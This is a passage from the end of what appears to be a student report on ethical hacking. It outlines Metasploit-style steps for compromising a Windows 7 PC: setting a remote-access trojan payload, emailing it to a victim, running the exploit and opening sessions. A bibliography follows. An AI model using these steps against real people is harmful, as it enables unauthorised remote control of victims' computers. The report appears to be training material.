• Now set payload to set the payload(RAT)

 Type show targets to shows all the targets

Page 35 of 38
 Now select 2nd option i.e PSH a PSH means powershell
 Now we show send copy payload present in root folder and create the executable file in
notepad and to the victims computer via email attachment or other manner.
 Now type exploit -j
 this will display a command on the console which should be run in victim system.
 After the victim opens the file sessions are created as below:

 Use sessions –i session id to enter into the session as shown above

 After successful enter into the session check the info to get details about the victim system

 Thus We have successfully hacked a window 7 pc.

Page 36 of 38
  Here are some the commands can be used:

Page 37 of 38
 Chapter-V

BIBLIOGRAPHY

PUBLICATIONS:
1. Tata McGraw-Hill.
2. Tutorial Point
BOOKS:
1. Joel Scambray, Stuart McClure,” Windows Hacking Exposed Windows:Windows Security Secrets
&Solutions”, Tata McGraw-Hill, 3th Edition.
3. “Ethical Hacking”, Tutorial Point Publishing.
WEBSITES:
1. http://udemy.com/
2. http://cybrary.com/

Page 38 of 38